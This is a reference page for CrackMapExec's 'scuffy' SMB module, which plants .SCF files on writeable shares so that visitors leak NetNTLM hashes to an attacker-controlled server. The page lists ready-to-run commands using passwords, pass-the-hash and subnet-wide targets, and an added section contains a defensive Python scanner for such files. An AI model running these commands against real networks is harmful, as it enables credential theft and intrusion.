CrackMapExec Scuffy (smb)
This page contains detailed information about how to use the scuffy CME module while using the smb protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module creates a .SCF file on all remote writeable shares. The .SCF file contains an icon property with a UNC path pointing to an arbitrary SERVER location (ideally the attacker's machine). Afterwards, anyone who visits the shared folder (with the .SCF file inside) will automatically try to authenticate against the specified SERVER and send a NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.
The scuffy module is OPSEC unsafe, which means that it may touch the disk and can therefore trigger an alarm.
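Because the module writes a file to disk, the artefact can be swept for on file servers: a .scf file whose icon property is a UNC path. The following is an added example, not part of CrackMapExec or of the original page. It walks a mounted share and reports such files. The function names, the allow-list parameter and the sample contents are assumptions of the example, and the IconFile key name comes from the SCF format rather than from this page.

```python
import os
import re

# Constructed samples (not from the page); 192.0.2.10 is a documentation address.
SAMPLE_REMOTE = "[Shell]\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
SAMPLE_LOCAL = "[Shell]\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n"

# IconFile is the icon property Explorer resolves when it renders the folder.
ICON_RE = re.compile(r"^\s*IconFile\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)
# UNC prefix (\\host\... or //host/...); group 1 is the host.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")

def decode(raw):
    """SCF files are plain text: accept UTF-16 with a BOM, else UTF-8/ANSI."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def remote_icon_host(text):
    """Return the host an SCF's IconFile points at, or None for a local icon."""
    for value in ICON_RE.findall(text):
        m = UNC_RE.match(value.strip('"'))
        if m and m.group(1) not in ("?", "."):  # \\?\ and \\.\ are local prefixes
            return m.group(1)
    return None

def scan_share(root, allowed_hosts=frozenset()):
    """Return sorted (path, host) for .scf files with a UNC icon off the allow-list."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read(64 * 1024)  # SCF files are tiny; cap the read
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            host = remote_icon_host(decode(raw))
            if host and host.lower() not in allowed_hosts:
                findings.append((path, host))
    return sorted(findings)

if __name__ == "__main__":
    import sys
    for path, host in scan_share(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}\tIconFile host: {host}")
```

Entries in allowed_hosts are compared in lower case, so pass the names or IPs of legitimate internal file servers in that form.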
Supported Protocols
- smb
Module Source Code
Authors
Module Options
Here is a complete list of scuffy module options:
# cme smb -M scuffy --options
[*] scuffy module options:
SERVER IP of the SMB server
NAME SCF file name
CLEANUP Cleanup (choices: True or False)
The SERVER and NAME options are required! Make sure to set them when using this module.
Module Usage
This is how to use the scuffy module while using the smb protocol:
Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M scuffy -o SERVER=<host> -o NAME=<name>
Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M scuffy -o SERVER=10.0.6.11 -o NAME=test
Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test
CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:
# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test
The scuffy module can also be used against multiple hosts. Here's how to run it against multiple hosts:
# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
References
- https://room362.com/post/2016/smb-http-auth-capture-via-scf/
- https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/server/capture/smb
Version
This page has been created based on CrackMapExec version 5.1.7dev.